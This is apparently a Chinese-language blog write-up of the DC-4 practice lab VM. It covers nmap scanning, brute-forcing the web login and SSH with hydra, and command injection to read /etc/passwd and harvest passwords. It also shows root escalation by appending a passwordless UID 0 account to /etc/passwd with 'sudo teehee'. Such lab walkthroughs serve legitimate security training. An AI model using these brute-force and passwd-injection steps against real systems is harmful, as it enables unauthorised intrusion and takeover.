首页 > 其他分享 >DC_4靶机的简单复现

DC_4靶机的简单复现

时间:2023-07-24 10:26:02浏览次数:58  
标签:40.163 passwd teehee sudo DC 192.168 ssh 靶机 复现

DC_4

1.nmap

kali的IP:192.168.40.148

扫描同网段的其他IP:

nmap -sP 192.168.40.148/24

image-20230724092408288

扫描结果:

image-20230723215836508

先IP后mac地址

再通过查看DC_4的mac地址,可得DC_4靶机的IP:192.168.40.163

全盘扫描:

nmap -A 192.168.40.163 -p 1-65535 -oN nmap.A

-A:该选项表示使用 "Aggressive" 扫描模式,进行更深入的探测,并尝试进行操作系统和版本的识别。

-oN nmap.A:将扫描结果以正常格式输出到名为 nmap.A 的文件中。

image-20230723220254146

可得:1.22端口开启了SSH服务 2.80端口开放HTTP服务

根据第2条信息,访问可得:

image-20230723220545700

发现了一个登录框,然后bp弱口令爆破:

2.bp

猜测账户名为admin,所以这里是爆破密码

image-20230723220952982

采用的字典是:https://wwwg.lanzouk.com/iOR4k13c1ufi

爆破得到密码是happy

登录后点击可得地址:http://192.168.40.163/command.php

image-20230723221442738

3.RCE

执行了命令,点击"RUN"并抓包可得:

image-20230723221527153

查看/etc/passwd:

image-20230723221702038

查看所有普通用户的用户名:

image-20230723223339823

发现了有3个普通用户:

charles、jim、sam

然后查看他们的家目录:

image-20230723224453861

在jim的家目录下发现了3个文件:backups,mbox,test.sh

在backups目录下发现了旧密码备份文件:old-passwords.bak

image-20230723225409157

image-20230723225500164

根据以上结果,制作密码字典与用户名字典:

image-20230723225905743

4.ssh爆破

利用两个字典对SSH(对应22端口)进行爆破:

 hydra -L user.dic -P passwd.bak ssh://192.168.40.163 -vV -o hydra.ssh

字段解析:

-L user.dic: 指定用户名列表

-P passwd.bak:指定密码列表

ssh://192.168.40.163:指定爆破得IP地址

-vV:设置 hydra 为详细模式,显示更多的输出信息

-o:hydra.ssh:将结果输出到名为hydra.ssh的文件中

查看hydra.ssh对象:

image-20230723230850606

用户名:jim 密码:jibril04

尝试使用ssh登录:

ssh [email protected] -p 22

image-20230723231441190

5./var/mail信息泄露

根据WP,查到了/var/mail:

image-20230723231821608

得到了另一组账号密码:

charles   
^xHhA&hvim0y

ssh登录:

ssh [email protected]

image-20230723232120280

查看不需要密码就能使用root权限执行的命令:

sudo -l

image-20230723232253790

发现了teehee命令

teehee:https://www.cnblogs.com/zlgxzswjy/p/16118468.html

image-20230724091953347

即:

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

再来一个su raaj即可提权成功

另外,尝试不用ssh [email protected],直接在jim用户下运行sudo -l:

image-20230724091605226

即jim用户在dc-4靶机上以超级用户权限运行 sudo 命令, jim 用户没有被授予 sudo 的执行权限,所以必须要用ssh [email protected]登录charles用户

6.teehee提权

关于teehee:

teehee:https://www.cnblogs.com/zlgxzswjy/p/16118468.html

image-20230724091953347

即:

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

再来一个su raaj即可提权成功

所以在passwd后面追加:

sudo teehee -a /etc/passwd
GGG::0:0:::/bin/bash

image-20230723232638293

也可直接使用:echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd && su raaj来提权

image-20230724093202329

7.小结:

重要步骤有:

# nmap扫描
nmap -sP 192.168.40.148/24
nmap -A 192.168.40.163 -p 1-65535 -oN nmap.A

# bp爆破使用的字典:
C:\Users\Star\Desktop\漏洞(靶场)学习资源\字典合集\top1000.txt

# ssh爆破与登录
hydra -L user.dic -P passwd.bak ssh://192.168.40.163 -vV -o hydra.ssh
ssh [email protected] -p 22

# /var/mail信息泄露
cd /var/mail

# 查看无需密码便可执行的命令
sudo -l

# teehee提权
sudo teehee -a /etc/passwd
GGG::0:0:::/bin/bash
# 或直接:
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd && su raaj

标签:40.163,passwd,teehee,sudo,DC,192.168,ssh,靶机,复现
From: https://www.cnblogs.com/hello-admin/p/17576537.html

相关文章

  • java spark-core wordcount
    实现JavaSpark-CoreWordCount流程概述下面是实现JavaSpark-CoreWordCount的整体流程:步骤描述1.创建SparkConf创建一个SparkConf对象,设置应用程序的名称和运行模式2.创建JavaSparkContext创建一个JavaSparkContext对象,用于连接Spark集群3.加载文本文件......
  • DevExpress中GridControl控件的基本属性设置和使用方法
    (18条消息)DevExpress中GridControl控件的基本属性设置和使用方法_gridcontrol隐藏列_潘达小新的博客-CSDN博客......
  • G2、人脸图像生成(DCGAN)
    ......
  • CloudCanal 数据脱敏实践
    简述本文主要介绍使用CloudCanal做数据迁移同步时如何对特定数据做脱敏处理。技术点自定义代码CloudCanal允许用户上传业务代码到数据任务中,完成数据迁移、同步过程中数据处理的目的。数据同步脱敏也是基于自定义代码实现,具备以下特点:脱敏范围灵活,可选择任何一个或多个......
  • 浅谈ADC驱动器设计
    引言谈及ADC设计时,必然要了解输入信号是什么、具有什么样的特性及采集系统的指标是什么,所以ADC的输入设计也是采集系统设计的一个难点和重点,需要根据不同的要求设计ADC的前端电路。1.高速ADC模拟输入指标对于高速ADC系统而言,我们必须明确其输入的指标要求,才能更好的发挥出ADC......
  • 【有奖互动】开发者版本新特性,你期待哪些更新?#HDC.Together2023#
     <hdc.together<span="">>华为开发者大会2023再次启航,将于8月4日~6日在中国松山湖举办,承载万千期待,开启崭新时代。聚焦新版本、新体验、新流量、新商业、新机遇,构建建未来智慧生活蓝图。#HDC.Together2023#首波预热话题互动于7月19日正式启动,欢迎广大开发者积极参与! 【参......
  • BOSHIDA DC电源模块关于转换效率的问题
    BOSHIDADC电源模块关于转换效率的问题DC电源模块是电子系统中常用的电源供应器件。其作用是将交流电转换成稳定直流电,以供电子设备使用。DC电源模块在实际应用中,其效率是一个非常重要的指标。因为高效率的电源模块可以减少功耗,提高电源的使用寿命,降低散热需求等。DC电源模块转......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • squidclient
    squidclientsquid服务器的客户端管理工具补充说明squidclient命令使用squid服务器的客户端管理工具,它可以查看squid服务器的详细运行信息和管理squid服务器。语法squidclient(选项)(参数)选项-a:不包含“accept:header”;-r:强制缓存重新加载URL;-s:安静模式,不输出信息到标......
  • CI流水线中Jenkins应用实践丨IDCF
    作者:达日汗,中国农业银行研发中心,系统支持部 CI(ContinuousIntegration)在维基百科中的定义是:经常将几个小改动合并到一个主分支中,强调开发人员提交了新代码之后,立刻进行构建和(单元)测试。持续集成可以帮助开发人员尽早定位到错误,控制开发流程,减少大量不必要的工作,提高工作效率。一......